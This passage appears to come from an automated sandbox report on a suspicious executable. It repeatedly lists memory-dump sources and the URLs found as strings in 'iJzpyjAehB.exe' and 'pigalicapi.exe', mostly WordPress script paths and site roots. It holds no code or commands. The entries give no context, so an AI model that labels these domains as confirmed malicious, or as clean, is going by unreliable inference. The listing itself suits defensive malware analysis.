00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/%
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/G
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/
                      Source: pigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/
                      Source: pigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/g
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.484497313.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.398318769.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.publi-web.net
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/9
                      Source: iJzpyjAehB.exe, 00000000.00000003.511351222.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/M
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/
